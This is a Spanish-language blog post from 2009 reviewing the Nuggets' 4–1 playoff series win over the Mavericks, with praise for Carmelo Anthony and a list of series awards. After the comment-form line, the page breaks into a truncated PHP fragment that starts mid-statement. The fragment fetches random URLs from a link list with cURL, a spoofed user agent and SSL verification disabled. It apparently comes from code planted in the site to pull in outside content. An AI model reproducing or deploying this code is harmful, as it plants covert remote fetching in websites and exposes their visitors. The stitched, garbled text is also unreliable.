Nuggets 4 – Mavericks 1: Melo se hace hombre

14 de May de 2009 por TheDeerHunter

Hubo un tiempo, cuando Melo llevó a su equipo a los Playoffs pero Lebron se llevó el RoY, en que muchos pensaban que el de los Nuggets era más jugador que “el elegido”.

No sabemos hasta que punto el peso de esta comparación ha perturbado el desarrollo de Carmelo Anthony, aunque desde hace algún tiempo el debate ya ni se plantea. No es nuestra intención reabrirlo pero, con una media de 30 puntos por partido, casi 7 rebotes y más de 3 asistencias, hablar de esta eliminatoria es hablar de él como protagonista, de la mejor actuación de largo de toda su carrera y de un duelo de tú a tú contra todo un MVP como Dirk Nowitzki. Ha sido muy grande y con la trayectoria del chaval, mucho más destacable todavía.

Acerca de su rendimiento se pueden aplicar muchas teorías, algunas de ellas nada desencaminadas, relativas al influjo Chancey Billups y el peso específico de uno y otro. No cabe duda de que el base va a ser uno de los nombres del año pero el hecho es que, tras esta temporada, podemos empezar a pensar que Melo por fin se ha hecho un hombre.

Eso sí, tampoco lancemos las campanas al vuelo. El rendimiento de estos Nuggets es una gran noticia pero no olvidemos que reman a favor de la corriente. Con los Cavs son los dos equipos menos castigados por las lesiones y, como alguien comentó el otro día, sabemos que este es un factor determinante a estad altura de la temporada. El próximo rival teóricamente serán los Lakers, el tercer beneficiado en discordia en ese sentido. Se puede ganar y perder, pero será interesante ver cómo se comporta Carmelo cuando las cosas se pongan algo más difíciles.

En contraposición la historia de Dallas esta postemporada está intrínsecamente relacionada con la disposición de sus efectivos y, en este sentido, durante los dos primeros partidos en Denver fueron especialmente castigados. A medida que los han ido mal-recuperando, la serie ha llegado incluso a ser vibrante. Se puede perder así, dando la cara como jabatos. El peor sabor de boca es ser consciente de que éste es un proyecto moribundo. Le toca a Cuban mover ficha.

Los otros nombres propios de la serie, además de Melo y Nowitzki, y sin menospreciar el gran papel de Billups y Nené por lo apenas noticioso, han sido J.R. Smith y Chris Andersen. Del primero muy pocas cosas vamos a descubrir ahora, pero su duelo contra el oficial Mejor Sexto Hombre de la liga apenas le ha supuesto un reto. En cambio pocos esperábamos encontrar en “Bird Man” ese sensacional nivel de intensidad y pundonor que ha empleado en su defensa sobre Nowitzki. Al final, como es lógico, ha prevalecido el alemán, pero qué espectáculo… y habría que pensar qué parte de la victoria le corresponde exclusivamente a Andersen.

Por cierto, 24 años hacía que Denver no alcanzaba este hito. Ya había llovido, ya…

PREMIOS

MVP: El evidente es Carmelo Anthony, como no puede ser de otra manera, por los números que ya hemos presentado arriba. El invisible es Chauncey Billups, responsable directo de lo otro y también ganando su propia batalla a un buen Jason Kidd. Premio compartido, como les gusta a los americanos.

La Sorpresa: Los que no seguimos a los Nuggets habitualmente nos lo hemos pasado de vicio con las que monta Chris Andersen y sus alitas tatuadas. Seguro que no serán de angelito. Ahora se entiende un poco más la mejora defensiva del equipo de George Karl.

La Decepción: Más allá de las actuaciones de Howard y Dampier, en teoría con excusa, la decepción ha sido el flamante Mejor 6º hombre de la liga, Jason Terry. No sólo por el bajón de rendimiento con respecto a los números que le han proporcionado el premio, sino por su némesis, JR Smith, que le ha tocado la carita bien tocada.

El Mayor esfuerzo en vano: El flamante oficial mejor ala-pívot de la liga, Dirk Nowitzki. Ha hecho todo para ganar. Dirk contra el mundo. No esperábamos menos de él. Un grande.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>